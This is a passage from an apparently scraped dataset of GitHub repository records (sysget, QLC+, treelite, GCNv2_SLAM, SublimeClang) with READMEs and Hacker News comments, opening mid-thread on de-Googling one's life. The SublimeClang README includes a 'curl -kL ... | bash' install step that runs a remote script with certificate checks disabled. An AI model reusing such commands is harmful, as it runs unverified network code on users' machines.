ever use another Google product. 
My Apps account was essentially just a custom domain on a Gmail interface and Cost them no more resources than Gmail, and presumably they got all the same benefits via ad tracking, so it felt particularly unnecessary to cancel.I don't use any of Google services or products.Fairphone 3+ with /e/OSFirefox + uBlock + uMatrix + NoScriptDuckduckgoTutanota (mail, calendar) and ecloud (mail, calendar, notes, tasks)Quad9 DNSSyncThingOpenStreetMapMagic EarthDeepLWeTransfer doesn't belong to Alphabet \u2014 it's an independent Dutch company. Netflix doesn't either.I use ungoogled-chromium and I'm pretty happy with it https://github.com/ungoogled-software/ungoogled-chromiumI should move away from Gmail too but that's the hardest part imo. I mostly have trust issues if that make sense. Not that I trust Google that much but I just don't know if any other email service will be around in 20 years or so. Probably Microsoft and Apple? iCloud Mail sounds good just don't have any experience with it (and it only works with custom domains afaik)No. I don't care. I'm happy to hide in the crowd.IMHO any data I generate is basically useless chaff. I still have yet to be convinced that there's a downside to this parasitic relationship. How exactly is my life, in a practical way, negatively impacted by this data going walkabout? Does it take years or months off my expected lifespan? Does it give me cavities? Does it turn my family and loved ones against me? Does it slow my typing speed?Point me to a good non-philosophical non-ideological non-emotional argument and I'll spend my time and money on transitioning to non-google sources for my problem-solutions.I doubt you can get rid of google like that.There is Google services that you and me don't know that we are using.What can be done is stop outgoing traffic to Google AS. \nYou can physically cut off internet connection for google devices.\nOr set rules on firewall.Isn't Brave based on Chromium (i.e. still some Google behind)?I never really \"googled\" it in the first place.Since I started using a smartphone/Android, I've been on CyanogenMod/LineageOS without Play services installed. I use FOSS apps from f-droid (Firefox, K-9 Mail, osmand~, DAVx5, Gadgetbridge, Signal) exclusively, and self-host the server-side of all my email (postfix/dovecot/amavis/opendkim) and CalDAV/CardDAV (radicale) stuff. I even set up my own public-ish DNS recursor that all networks I take care of use.Never regretted any of it, but I'm aware few will find it enjoyable taking care of some of this infrastructure. I am lucky that I do :)Partly, Google even helped me with the deprecation of the free gsuite. I never really found out what their solution was for private use, so I migrated the two domains I had.I still have a gmail account, which is kinda needed for YouTube Premium, which is a service I do enjoy.I've been looking/trying many search engines (you.com, duckduckgo, etc.). As someone who is not from the US, none of them is able to provide local search results anywhere as good as Google Maps. e.g. I want cheap food near me. Name of a local restaurant, etc. Until then, sadly I'll have to stick with Google.Also, Google Sheets & Docs are really really good too. I can live without Gmail.> Your data is worth a lotEhhhh, not so sure about this.\u2022 Your individual data is worth a lot of money in aggregate with the data of thousands/millions of other users, but it is difficult (impossible?) 
to exchange your individual data for money\u2022 If you're talking philosophical/non-monetary \"worth\" then this varies from person to person. I value my data almost not at all.A few weeks ago there was a post about Kagi[0] which is a paid search engine, I tried the trial and used all my searches, then immediately became a customer and have no regrets.[0] https://kagi.com/Phone:Pixel 4a with Graphene OS, only GCam Services Provider (https://github.com/lukaspieper/Gcam-Services-Provider) to be able to use Google Camera. Implementation is super simple and it shouldn't take long to see that it actually does nothing.Browser:Firefox - followed https://blackgnu.net/firefox-hardening-guide.html; Fennec on AndroidSearch - https://searx.space/ (plan on self hosting one)Youtube - https://docs.invidious.io/instances/ (plan on self hosting one)Passwords:Bitwarden - backups done regularly to encrypted external storage and encrypted rclone mountEmail:Tutanota/Protonmail + custom domain2FA:AegisMessaging:Signal - easiest way to setup for non-technical friends and family. Used to use a few different apps, but only use this right now. I also use https://meet.jit.si/ occasionally for calls on the laptop/desktop.VPN:Mullvad - currently working on setting up my own.Maps:Organic Maps on Android/Open Street Maps on desktop/laptop.Sync:Syncthing - syncing desktop, laptop, a few phones to my home server on LAN only.Notes:Markdown files kept on devices, synced through syncthing.Media:Emby - had issues with Jellyfin, but might revisit in a few months as I have some plans there.\nAirsonic - musicAdblocker:Mullvad + ublockoriginCalendar:TutanotaAnalytics for website:C# console app that parses caddy logs and clears logs after parsing.Cloud:Create encrypted mount with rclone and dump backups there when needed.It was a slow process to get here and I am lucky to have friends who followed me on this journey to be honest. The first step came while working for my final project at university and building something around my heavy dislike for Facebook. Once I had to research the subject more in depth I started to realize how wrong I was all these years entrusting troves of data to the highest bidder... I had a friend who had asked me about these things and I am sorry for not listening to him sooner, but I felt that he never went past \"bro, you shouldn't trust google!\". Which is I think what most of us do.I am trying to have conversations about this with everyone and try to adjust my language to their level. It's good because it highlights how little I know and it works both ways as I have to learn myself a bit more about any given topic. It's quite nice. It's even better to have people who have followed me on this path, moving to devices with no google services at all on them, moving away operating systems and so on.If you think you're stuck, try to get rid of an app or two and see how it goes. Most of them add little to NO value to your life and your tech stack so trust yourself and delete them. It took me about a year to fully get rid of any google related stuff (and I include micro G here to allow me to run stuff like WhatsApp/YT/Gmail/Maps). And I knew it's bad, so I imagine it's a lot harder if you don't think there are risks.Some things are more difficult, but my phone is now a tool that quietly sits on a desk somewhere in the house and I use it to do something specific. 
It's also reassuring to know it's not constantly feeding off me to send info to whoever is interested in my particular demographic.As an afterword, please, all of you who suggest open source alternatives, also keep in mind that most of these projects have very little financial support. A few dollars, euros, pounds might not mean much to you, but it could make the world of difference for all these people working to keep our data safe and our devices useful. Stop recommending people stuff and starting with \"it's free\" and phrase it with \"it's private and secure...\". Start introducing the cost early on. Without our support these alternatives can and will vanish or will morph to attempt to keep themselves alive.Personally, I created a chrome extension for myself where I track my own behavior locally and recommend myself content from sites i like (youtube/twitter/quora/etc) in a feed. Would rather have control over my own algorithm and own the data. Also it gives me flexibility. Turns out I do like these feeds just not when I don't own it haha.#ADMany of these services are SaaS solutions that require a separate ToS and SPoF. The idea behind de-googling should be focused on self-hosted alternatives, not just other service providers.I've been actively degoogling my life for about 10 years, mostly kicked off by Snowden's revelations. Off the top of my head, here's what's left:\u2022 YoutubeToo much content there to stop using. I almost never use it while logged in. I never subscribe: I bookmark the channel.\u2022 MapsToo useful to stop using. Haven't tried alternatives, but open to recommendations. Business locations and open/close times are must haves for me.\u2022 DuoIt's a videophone that mostly works.\u2022 ChromeI never stopped using Firefox as my main browser since ~2005, but I'll use Chrome from time to time, mostly for website development and watching Youtube.\u2022 GMailI've almost completely moved off it about a year ago for Fastmail, but I keep checking my existing GMail. Probably should get around to moving over completely.\u2022 AndroidI'm a recent LineageOS convert, but still use it with the Play Store.I never trusted google, so first step to degoogling is actually never start to use google products.However there are few tools that has no competition yet. Unfortunately. YouTube and Gboard with swipe (for non English lang).The only trace left from Google in my life is search. No, DDG is unfortunately nowhere near Google Search.The day I could replace that too, I'll try my best not to touch a Google product ever again.I switched back to FF the day I noticed that I could \"log in\" to Chrome, and that the browser had already logged me in by default.Also switched to ProtonMail for anything shopping or bill-related, and paid for a ProtonVPN subFor me, talk about \"de-googling\" and other such processes comes down to really thinking about what your goals are. It's easy to get into a binary all-or-nothing frame of reference, which I don't think is constructive as for most use cases \"some\" is still significantly different from \"none.\"My own goals/use cases:- I'm unhappy with the current economics of the online world, that are based on advertising. I accept that developing products requires money, and getting money requires a business model, so if I don't like the incentives ad-based business creates, I should actively support alternative models- I'm unhappy with the intrusiveness of tracking. 
I think consent is important -- not as a legal concept, but as a regular human being understands it. When I interact with a person or organization, I can meaningfully give consent for their actions. I can't meaningfully give consent to what some third party who isn't part of that interaction does, regardless of the legal fine print that says.- I'm happy that the internet has become mainstream and people who aren't \"tech people\" use it.- I'm not concerned with targeted attacks, but am concerned with opportunistic attacks against my online accounts and identities.- Yes, \"identities\" -- I believe people should be able to have multiple identities online.With those criteria, my current set up:- password manager -- no reusued passwords. Whole family uses this.- Fastmail. Because I use email so much, it's clearly a valuable service for me. So it' worth paying for -- I'm many years out from being a broke college student.- A domain I purchased just for emails, and make use of subdomain addressing. I tend to use a different subdomain email per service. Goes to the goal of multiple identities, reducing tracking and reducing opportunistic attacks- I've kept my gmail address and forward it to my fastmail, because I don't want to make my personal contacts use a different email address than they have for years. Maybe I'll change that some day, but I'm ok with _reducing_ rather than _eliminating_ google in my life- FireFox. Also Mozilla VPN, to give Mozilla some money, though in practice I don't really have a frequent use for VPN.- Duck Duck Go- Ublock Origin- Subscriptions to a handful of news outlets I read frequently. Print subscription for one of them!- Separate computer for work vs personalBiggest gap I'm still uncomfortable with: Shopping on Amazon.Shouldn't this post be clearly labeled a show hn: internxt, not an ask hn ?GrapheneOS! It's an amazing OS. The transition was quick and seamless and I was surprised that had to make zero sacrifices, because it allows you to create separate profiles. I have one profile with a Google Play Services sandbox, which the OS provides as a one-click install. It's useful to run banking/ride-sharing apps, etc. It's very quick to transition between profiles.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "emilengler/sysget", "link": "https://github.com/emilengler/sysget", "tags": [], "stars": 654, "description": "One package manager to rule them all", "lang": "C++", "repo_lang": "", "readme": "# sysget\n\n[![Build Status](https://travis-ci.org/emilengler/sysget.svg?branch=master)](https://travis-ci.org/emilengler/sysget)\n### A front-end for every package manager
\nsysget is a bridge that lets you use one syntax with every package manager on every Unix-based operating system.
\nYou probably know the problem: you are on a new distro and don't know anything about its package manager. With sysget you just need to remember one syntax for every package manager.
\nThe syntax is mostly the same as apt's, so it should be easy to use.
\n### Supported package managers:\n* apt\n* xbps\n* dnf\n* yum\n* zypper\n* eopkg\n* pacman\n* emerge\n* pkg\n* pkg_mgr\n* chromebrew\n* homebrew\n* nix\n* snap\n* npm\n* flatpak\n* slapt-get\n* pip3\n* GNU guix\n* Ruby gems\n* MacPorts\n* Your own package manager (see \"Add your own package manager\" below)\n\n### Features\n* search for packages\n* install packages\n* remove packages\n* remove orphans\n* clear package manager cache\n* update database\n* upgrade system\n* upgrade single package\n\n### How to install\nPlease take a look at the docs/ folder.
\nIn a nutshell:
\n```make && sudo make install```
\nNo dependencies are needed.\n\n### Example\nTo search for a package\n```\nsysget search <package>\n```\nTo install a package\n```\nsysget install <package>\n```\nTo remove a package\n```\nsysget remove <package>\n```\nTo update the database\n```\nsysget update\n```\nTo upgrade the system\n```\nsysget upgrade\n```\nTo upgrade a specific package\n```\nsysget upgrade <package>\n```\nTo remove orphans\n```\nsysget autoremove\n```\nTo clean the cache of the package manager\n```\nsysget clean\n```\n### Environment Variables\n| Environment Variable | Function |\n|----------------------|---------------------------------------------------------------------|\n| SYSGET_CONFIG_PATH | Ability to change the path of the sysget config file |\n| SYSGET_CUSTOM_PATH | Ability to change the path of the file for a custom package manager |\n| SYSGET_ARGS_PATH | Ability to change the path of the file for custom arguments |
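\nFor example, to run sysget with a per-user config file (the path shown here is only an illustration):\n```\nSYSGET_CONFIG_PATH=\"$HOME/.config/sysget\" sysget update\n```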
\n### Configuration files\nThe file where the chosen package manager is stored is located at `/etc/sysget/sysget`.\nThe *optional* file where a custom package manager is stored is located at `/etc/sysget/custom`.
\n### Add your own package manager\nsysget also gives you the ability to add your own package manager.
\nSimply create the file `/etc/sysget/custom` and then write **8** lines into it.
\nOne line per command.
\nThe order is: search, install, remove, autoremove, update, upgrade, upgrade_pkg, clean.
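\nFor example, a custom file that simply delegates everything to apt might look like this (the exact command forms are only an illustration):\n```\napt search\napt install\napt remove\napt autoremove\napt update\napt upgrade\napt install --only-upgrade\napt clean\n```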
\n### Change the sysget syntax\nSimilar to adding your own package manager, you can also modify the syntax of sysget. For example, you can give sysget the pacman syntax.\nSimply create the file `/etc/sysget/args` and add 10 lines to it.\nThe order is: search, install, remove, autoremove, update, upgrade, clean, set, help, about.
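\nFor example, a pacman-flavored args file might look like this (the flag choices are just an illustration):\n```\n-Ss\n-S\n-R\n-Rns\n-Sy\n-Syu\n-Sc\nset\nhelp\nabout\n```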
\nHowever, there are some rules:
\n* The file needs to have exactly 10 lines\n* Listing the same item twice is forbidden\n### Languages\nWe support the following languages:\n* English\n* German\nThe language is selected using $LANG; English is the fallback option.\n###### Credits\n[TermGet](https://github.com/termget/termget)\n[JSON](https://github.com/nlohmann/json)\n", "readme_type": "markdown", "hn_comments": "I'm curious why the author chose to put every command in its own file and then copy the big if tree with string compares in every file.Translating commands from a generic command interface to specific commands is a great case for polymorphism.That's not nearly \"every package manager\".Topgrade [1] upgrades all packages including distribution package managers (such as Homebrew, APT, DNF, ...), language specific package managers (such as Cargo, NPM, Gem, ...), program specific package managers (such as Vim, Tmux, shells, ...), Flatpak/Snap, working on The Big Three (Windows, Linux, macOS).I wish there was a way to update Steam and Battle.net from the CLI as well.[1] https://github.com/r-darwish/topgradeThe title of the submission is a bit misleading:> GitHub: sysget \u2013 A front-end for every package manager (github.com)Right now, it seems like it is GitHub's own project when it's just hosted on GitHub.It should be:> Show HN: sysget \u2013 A front-end for every package manager (github.com)How does this handle edge cases like needing to run 'brew link' etc. occasionally?What happens when multiple package managers provide the same package?Seems like a cool idea!Just a thought, what if you allowed it to run in different modes, for people used to different systems? apt mode, yum mode, pacman mode etc to accept commands in that format.Obligatory xkcd: https://xkcd.com/1654/Missing flatpak :(Is packagekit completely dead and forgotten these days?There is also https://github.com/icy/pacapt(I much prefer pacman's interface over trying to remember which of dpkg/apt-get/apt-policy to use etc., similarly rpm/dnf)Where's conda?All it does is compare strings and shell out, should be written in something like Bash rather than C++.A wrapper around emerge? Nope...Some configuration management tools already abstract package managers. For example: https://puppet.com/docs/puppet/6.0/type.html#package.... why not PackageKit?pkcon is a good tool, even if a bit janky, that hides well lots of the differences between the several package managers it supports.I like this. This makes a lot of sense to me. If it managed to gain adoption into major distros, it would be incredibly good, though obviously that is a longshot for a lot of reasons.If you really want it to get adopted into major distros, the best approach is probably to convince the systemd folks that it would be a great addition to their package ;)edit: A bit of constructive criticism. I really like the concept, but I think the way that package managers are supported could be improved. I think it would be better if all of the handlers for a given package manager were in the same file, instead of having them spread across every file. There's obviously lots of ways to accomplish this.Also, as it is now, this project does not seem to use a ton of things that require C++ - you could shave some binary size cost by converting it to pure C.It seems nowadays people just upvote based on just the title. This is a switch statement wrapper around package managers, on the front-page of HN.On the surface this looks like a useful project. 
If you plan to use it, do yourself a favor and avoid looking at the source code.C++ is an \"interesting\" language choice. I would have expected a bash script. Equally portable, and no hassle with compilation for different arch/OS.Some missing features: - Show version of an installed package\n - List content of package\n - Fix package (or reinstall?)\n - Install/Update history\n - Revert last install/update operation\n\nUnfortunately not all of these features are directly supported by all package managers.\nE.g. package contents for yum are `repoquery -l`.\nI have to google this every time. Real value in wrapping that in a simple command.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mcallegari/qlcplus", "link": "https://github.com/mcallegari/qlcplus", "tags": ["c-plus-plus", "qt", "lighting", "enttec", "qml", "dmx", "dmx512", "dmxking", "artnet", "e131", "midi", "hid"], "stars": 653, "description": "Q Light Controller Plus (QLC+) is a free and cross-platform software to control DMX or analog lighting systems like moving heads, dimmers, scanners etc. This project is a fork of the great QLC project written by Heikki Junnila that aims to continue the QLC development and to introduce new features.", "lang": "C++", "repo_lang": "", "readme": "Q Light Controller Plus 4\n=========================\n\n![QLC+ LOGO](resources/icons/png/qlcplus.png)\n\nCopyright (c) Heikki Junnila, Massimo Callegari\n\nQLC+ homepage: https://www.qlcplus.org/\n\nQLC+ on GitHub: https://github.com/mcallegari/qlcplus\n\nDEVELOPERS AT WORK\n------------------\n\nIf you're compiling QLC+ from sources and you regularly do \"git pull\"\nto get the latest sources, you probably end up seeing some\ncompiler warnings and errors from time to time. Since the whole source package\nis under development, you might even encounter unresolved symbols etc. that\nhalt the compiler immediately. If such a thing occurs, you should do a \"make\ndistclean\" on qlcplus (top-most source directory) and then \"qmake\" and \"make\"\nagain. We attempt to keep the GIT master free of fatal errors and it should\ncompile all the time. However, some inter-object dependencies do get mixed up\nsometimes and you need to compile the whole package instead of just the latest\nchanges. Sometimes even that doesn't work, because QLC+ installs its common\nlibraries to system directories, which (at least on unixes) are picked up instead\nof the ones in the source directory. 
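\n\nIn shell form, the full rebuild described above is:\n```\nmake distclean\nqmake\nmake\n```\n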
In those cases, you might try going to the libs\ndirectory, compile it with \"make\" and install with \"make install\" and then\nattempt to re-compile the whole package with \"make\".\n\nApache 2.0 License\n------------------\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License.\n\nRequirements - Linux\n--------------------\n\n* Qt >= 5.0 development libraries & tools\n* libudev-dev, libmad0-dev, libsndfile1-dev, libfftw3-dev\n* DMX USB plugin: libftdi-dev, pkg-config\n* HID plugin: No additional requirements\n* MIDI plugin: libasound, libasound-dev, pkg-config\n* ENTTEC Wing plugin: No additional requirements\n* OLA plugin: libola, ola-dev, pkg-config (see libs/olaout/README)\n* uDMX plugin: libusb, libusb-dev, pkg-config\n* Peperoni plugin: libusb, libusb-dev, pkg-config\n* Velleman plugin: Not available for Linux\n* OSC plugin: No additional requirements\n* ArtNet plugin: No additional requirements\n* E1.31 plugin: No additional requirements\n* Loopback plugin: No additional requirements\n\nRequirements - Windows\n----------------------\n\n* MSYS2 environment (https://msys2.github.io/)\n* DMX USB plugin: D2XX driver & development package (http://www.ftdichip.com/Drivers/D2XX.htm)\n* HID plugin: No additional requirements\n* MIDI plugin: No additional requirements\n* ENTTEC Wing plugin: D2XX driver & development package (http://www.ftdichip.com/Drivers/D2XX.htm)\n* OLA plugin: Not available\n* uDMX plugin: No additional requirements\n* Peperoni plugin: No additional requirements\n* Velleman plugin: K8062 SDK from www.velleman.eu\n* OSC plugin: No additional requirements\n* ArtNet plugin: No additional requirements\n* E1.31 plugin: No additional requirements\n* Loopback plugin: No additional requirements\n\nRequirements - Mac OS X\n-----------------------\n\n* XCode (http://developer.apple.com/technologies/tools/xcode.html)\n* Qt >= 5.0.x (http://download.qt.io/official_releases/qt/)\n* macports (https://www.macports.org/)\n* DMX USB plugin: macports, libftdi-dev, pkg-config\n* HID plugin: No additional requirements\n* MIDI plugin: No additional requirements\n* ENTTEC Wing plugin: No additional requirements\n* OLA plugin: libola, ola-dev, pkg-config (see libs/olaout/README)\n* uDMX plugin: macports, libusb-compat, pkg-config\n* Peperoni plugin: macports, libusb-compat, pkg-config\n* Velleman plugin: Not available\n* OSC plugin: No additional requirements\n* ArtNet plugin: No additional requirements\n* E1.31 plugin: No additional requirements\n* Loopback plugin: No additional requirements\n\nCompiling & Installation\n------------------------\n\nPlease refer to the online wiki pages: https://github.com/mcallegari/qlcplus/wiki\n\nSupport & Bug Reports\n---------------------\n\nFor discussions, feedbacks, ideas and new fixtures, go to:\nhttps://www.qlcplus.org/forum/index.php\n\nFor developers wiki and code patches, go to:\nhttps://github.com/mcallegari/qlcplus\n\nContributors\n------------\n\n### QLC+ 5:\n\n* Eric Arneb\u00e4ck (3D preview features)\n* Santiago Benejam Torres (Catalan translation)\n* Luis Garc\u00eda 
Tornel (Spanish translation)\n* Nils Van Zuijlen, J\u00e9r\u00f4me Lebleu (French translation)\n* Felix Edelmann, Florian Edelmann (fixture definitions, German translation)\n* Jannis Achstetter (German translation)\n* Dai Suetake (Japanese translation)\n* Hannes Bossuyt (Dutch translation)\n* Aleksandr Gusarov (Russian translation)\n* Vadim Syniuhin (Ukrainian translation)\n* Mateusz K\u0119dzierski (Polish translation)\n\n### QLC+ 4:\n\n* Jano Svitok (bugfix, new features and improvements)\n* David Garyga (bugfix, new features and improvements)\n* Lukas J\u00e4hn (bugfix, new features)\n* Robert Box (fixtures review)\n* Thomas Achtner (ENTTEC wing improvements)\n* Joep Admiraal (MIDI SysEx init messages, Dutch translation)\n* Florian Euchner (FX5 USB DMX support)\n* Stefan Riemens (new features)\n* Bartosz Grabias (new features)\n* Simon Newton, Peter Newman (OLA plugin)\n* Janosch Frank (webaccess improvements)\n* Karri Kaksonen (DMX USB Eurolite USB DMX512 Pro support)\n* Stefan Krupop (HID DMXControl Projects e.V. Nodle U1 support)\n* Nathan Durnan (RGB scripts, new features)\n* Giorgio Rebecchi (new features)\n* Florian Edelmann (code cleanup, German translation)\n* Heiko Fanieng, Jannis Achstetter (German translation)\n* NiKoyes, J\u00e9r\u00f4me Lebleu, Olivier Humbert, Nils Van Zuijlen (French translation)\n* Raymond Van Laake (Dutch translation)\n* Luis Garc\u00eda Tornel (Spanish translation)\n* Jan Lachman (Czech translation)\n* Nuno Almeida, Carlos Eduardo Porto de Oliveira (Portuguese translation)\n* Santiago Benejam Torres (Catalan translation)\n* Koichiro Saito, Dai Suetake (Japanese translation)\n\n### QLC:\n\n* Stefan Krumm (Bugfixes, new features)\n* Christian Suehs (Bugfixes, new features)\n* Christopher Staite (Bugfixes)\n* Klaus Weidenbach (Bugfixes, German translation)\n* Lutz Hillebrand (uDMX plugin)\n* Matthew Jaggard (Velleman plugin)\n* Ptit Vachon (French translation)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "dmlc/treelite", "link": "https://github.com/dmlc/treelite", "tags": [], "stars": 653, "description": "model compiler for decision tree ensembles", "lang": "C++", "repo_lang": "", "readme": "# Treelite\n\n![Coverage tests](https://github.com/dmlc/treelite/actions/workflows/coverage-tests.yml/badge.svg)\n[![Documentation Status](https://readthedocs.org/projects/treelite/badge/?version=latest)](http://treelite.readthedocs.io/en/latest/?badge=latest)\n[![codecov](https://codecov.io/gh/dmlc/treelite/branch/mainline/graph/badge.svg)](https://codecov.io/gh/dmlc/treelite)\n[![GitHub license](http://dmlc.github.io/img/apache2.svg)](./LICENSE)\n[![PyPI version](https://badge.fury.io/py/treelite.svg)](https://pypi.python.org/pypi/treelite/)\n[![Conda Version](https://img.shields.io/conda/vn/conda-forge/treelite.svg)](https://anaconda.org/conda-forge/treelite)\n\n[Documentation](https://treelite.readthedocs.io/en/latest) |\n[Installation](http://treelite.readthedocs.io/en/latest/install.html) |\n[Release Notes](NEWS.md) |\n[Acknowledgements](ACKNOWLEDGMENTS.md) |\n\n**Treelite** is a model compiler for efficient deployment of decision tree\nensembles.\n\n**NEW: Treelite is now used in the [Amazon Neo AI open source project](https://github.com/neo-ai/neo-ai-dlr).** See [here](https://aws.amazon.com/blogs/machine-learning/aws-launches-open-source-neo-ai-project-to-accelerate-ml-deployments-on-edge-devices/) for more information.\n\n**NEW: Treelite is now used in the [RAPIDS cuML 
project](https://github.com/rapidsai/cuml).**\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "jiexiong2016/GCNv2_SLAM", "link": "https://github.com/jiexiong2016/GCNv2_SLAM", "tags": [], "stars": 653, "description": "Real-time SLAM system with deep features", "lang": "C++", "repo_lang": "", "readme": "# GCNv2 SLAM\n\n## Introduction\nGCNv2 is a high-throughput variant of the Geometric Correspondence Network for performing RGB-D SLAM online on embedded platforms. We trained the binary descriptor in the same format as ORB (32 bytes) for the convenience of integration. In this implementation, we evaluate the motion estimation using a system built on top of [ORB-SLAM2](https://github.com/raulmur/ORB_SLAM2). Thanks to the robustness of ORB-SLAM2, our system is able to achieve reliable tracking performance on our drone platform in real-time. \n\n## Example\nOnline running performance with ORB and GCNv2 features:\n\nORB:\n\n![](orb.gif)\n\nGCNv2:\n\n![](gcn.gif)\n\n## Related Publications\n\n* **[GCNv2: Efficient Correspondence Prediction for Real-Time SLAM](https://arxiv.org/pdf/1902.11046.pdf)**, *J. Tang, L. Ericson, J. Folkesson and P. Jensfelt*, in arXiv:1902.11046, 2019\n* **[Geometric Correspondence Network for Camera Motion Estimation](http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=8260906&isnumber=8214927)**, *J. Tang, J. Folkesson and P. Jensfelt*, RA-L and ICRA 2018\n\n# Dependencies\n\n## C++11 or C++0x Compiler\nWe use the new thread and chrono functionalities of C++11.\n\n## Pytorch\nWe use the [Pytorch](https://github.com/pytorch/pytorch) C++ API (libtorch) for deploying GCNv2. \nlibtorch can be built as follows:\n```\ngit clone --recursive -b v1.0.1 https://github.com/pytorch/pytorch\ncd pytorch && mkdir build && cd build\npython ../tools/build_libtorch.py\n```\nThe built libtorch library is located at ```pytorch/torch/lib/tmp_install/``` by default.\n\n**Update: support has been added for the master branch of pytorch and versions newer than 1.0.1. For newer versions, set ```TORCH_PATH``` to ```pytorch/torch/share/cmake/Torch```**\n\n**At least 1.0.1 is required. Lower versions of pytorch have a cuDNN linking issue: https://github.com/pytorch/pytorch/issues/14033#issuecomment-455046353.**\n\n**Please avoid using the pre-built version of libtorch since it will cause linking errors (due to a [CXX11 ABI issue](https://github.com/pytorch/pytorch/issues/13541)).**\n\n## Pangolin\nWe use [Pangolin](https://github.com/stevenlovegrove/Pangolin) for visualization and the user interface. Download and install instructions can be found at: https://github.com/stevenlovegrove/Pangolin.\n\n## OpenCV\nWe use [OpenCV](http://opencv.org) to manipulate images and features. Download and install instructions can be found at: http://opencv.org. \n\n**At least 2.4.3 is required. Tested with OpenCV 2.4.11 and OpenCV 3.2**.\n\n## Eigen3\nRequired by g2o (see below). Download and install instructions can be found at: http://eigen.tuxfamily.org. \n\n**At least 3.1.0 is required**.\n\n## DBoW2 and g2o (Included in Thirdparty folder)\nWe use modified versions of the [DBoW2](https://github.com/dorian3d/DBoW2) library to perform place recognition and the [g2o](https://github.com/RainerKuemmerle/g2o) library to perform non-linear optimizations. 
Both modified libraries (which are BSD licensed) are included in the *Thirdparty* folder.\n\n# Preparation\nClone the code:\n```\ngit clone https://github.com/jiexiong2016/GCNv2_SLAM.git\n```\nThen build the project:\n```\ncd GCNv2_SLAM\n./build.sh\n```\nMake sure to edit `build.sh` to point to your local libtorch installation. Edit `run.sh` to check out how to run with GCNv2 or vanilla ORB. Check `Network.md` for the network structure and this [link](https://drive.google.com/file/d/1MJMroL5-tl0b9__-OiCfxFP9K6X8kvTT/view) for trained models.\n\n# Image resolution\n**Update:** Set \"FULL_RESOLUTION=1\" and use \"gcn2_640x480.pt\" to test with image resolution \"640x480\" instead. The input image size should be consistent with the model to be used.\n\n# Demonstration video\n\n[![YouTube video thumbnail](https://i.ytimg.com/vi/pz-gdnR9tAM/hqdefault.jpg)](https://www.youtube.com/watch?v=pz-gdnR9tAM)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "quarnster/SublimeClang", "link": "https://github.com/quarnster/SublimeClang", "tags": [], "stars": 653, "description": "C/C++/ObjC/ObjC++ autocompletions and code navigation", "lang": "C++", "repo_lang": "", "readme": "= Plugin discontinued =\n\n** I don't intend to continue development of this plugin, so I've disabled the issues page. If something is broken, submit a pull request and I'll consider merging it. The issue history is [[https://github.com/quarnster/SublimeClang/tree/master/issues|archived]] should you want to poke in it.\n\n** Eventually SublimeClang will be replaced by https://github.com/quarnster/completion, but as I don't code much in clang-supported languages these days it's not a very high priority for me personally.\nIf you'd like to see it move along quicker, submit a pull request in that project and/or participate in its discussions.\n\n=== Description ===\nClang plugin for Sublime Text 2 providing autocomplete suggestions for C/C++/ObjC/ObjC++. It'll also optionally parse the code as it's typed and show errors and warnings.\n\n=== Known issues and feature requests ===\nPlease go [[https://github.com/quarnster/SublimeClang/issues?sort=created&direction=desc&state=open|here]] to see the currently known issues and feature requests, or to file a new one.\n\n=== Prerequisites ===\n # To use the clang static analyzer you need to have clang installed and in your path. The other functionality should work without having the clang binaries installed.\n\n=== Additional Prerequisites (Linux Only)===\n # [[http://sublimetext.userecho.com/topic/85126-ctypes-cant-be-imported-in-linux/|ctypes can't be imported]] in the Linux version of Sublime Text 2 right now. 
This can however be worked around easily with the help of pythonbrew:\n ## curl -kL http://xrl.us/pythonbrewinstall | bash\n ## source \"$HOME/.pythonbrew/etc/bashrc\"\n ## pythonbrew install --configure=\"--enable-unicode=ucs4\" 2.6\n ## ln -s $HOME/.pythonbrew/pythons/Python-2.6/lib/python2.6/ /lib/python2.6\n # If you install SublimeClang via Package Control, it seems [[http://github.com/quarnster/SublimeClang/issues/97|libcache and libclang will be deleted]] when the package is updated, so it's recommended that you manually install the plugin by using the git commands listed in the Installation section.\n # Once SublimeClang has been installed, libcache will have to be compiled:\n ## cd src\n ## mkdir build\n ## cd build\n ## cmake ..\n ## make\n * Note that if a usable libclang library isn't found, it will be downloaded and built as part of the build process.\n\nIf you run into any issues, please have a look at issue [[https://github.com/quarnster/SublimeClang/issues/35|#35]] for additional notes or to ask for help.\n\n=== Installation ===\n # The easiest way to install SublimeClang is via the excellent Package Control plugin. Note that SublimeClang doesn't install correctly with version 1.6.3\n of Package Control; either use the latest testing version or (if it exists) \n a newer stable version of Package Control.\n ## See http://wbond.net/sublime_packages/package_control#Installation\n ### Once Package Control has been installed, bring up the command palette (cmd+shift+P or ctrl+shift+P)\n ### Type Install and select \"Package Control: Install Package\"\n ### Select SublimeClang from the list. Package Control will keep it automatically updated for you\n ## If you don't want to use Package Control, you can install the plugin manually\n ### Go to your packages directory and type:\n #### git clone --recursive https://github.com/quarnster/SublimeClang SublimeClang\n #### After this you'll have to compile libcache as described in the Additional Prerequisites (Linux Only) section\n ### To update, run the following command:\n #### git pull && git submodule foreach --recursive git pull origin master\n # Back in the editor, open up the command palette by pressing cmd+shift+P or ctrl+shift+P\n # Type SublimeClang and open up the settings file you want to modify with any include directories or other options you want to provide to clang.\n\n=== Usage ===\nAfter installation, suggestions from clang should be provided when triggering the autocomplete operation in Sublime Text 2. By default it'll inhibit the Sublime Text 2 built-in word completion, but the inhibition can be disabled by setting the configuration option \"inhibit_sublime_completions\" to false.\n\nIf you modify a file that clang can compile and if there are any errors or warnings in that file, you should see the output in the output panel, as well as having the warnings and errors marked in the source file.\n\nThere are also the following key bindings (tweak Default.sublime-keymaps to change):\n\n |alt+d,alt+d|Go to the parent reference of whatever is under the current cursor position|\n |alt+d,alt+i|Go to the implementation|\n 